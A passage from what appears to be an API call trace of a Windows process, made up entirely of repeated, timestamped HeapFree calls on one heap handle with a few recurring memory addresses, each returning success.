hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0165.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0165.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0165.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0165.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0165.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0166.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0166.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0166.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0166.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0166.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0166.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0166.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0166.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0167.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0167.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0167.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0167.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0167.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0167.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0167.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0167.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0168.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0168.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0168.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0168.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0168.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0168.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0168.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0168.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0168.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0168.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0168.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0168.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0168.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0168.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0168.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0168.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0168.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0168.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0168.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0168.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0168.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0168.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0168.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0168.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0168.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0168.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0168.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0168.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0168.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0168.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0168.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0168.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0169.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0169.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0169.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0169.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0169.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0169.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0169.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0169.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0169.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0169.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0169.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0169.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0169.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0169.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0169.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0169.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0169.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0169.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0169.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0169.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0169.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0169.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0169.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0169.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0169.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0170.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0170.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0170.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0170.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0170.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0170.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0170.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0170.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0170.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0170.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0170.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0170.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 